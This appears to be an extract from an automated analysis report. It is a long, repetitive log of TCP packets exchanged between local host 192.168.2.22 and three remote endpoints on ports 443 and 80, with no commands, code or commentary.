              Source: global trafficTCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
              Source: global trafficTCP traffic: 188.114.96.6:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
              Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
              Source: global trafficTCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
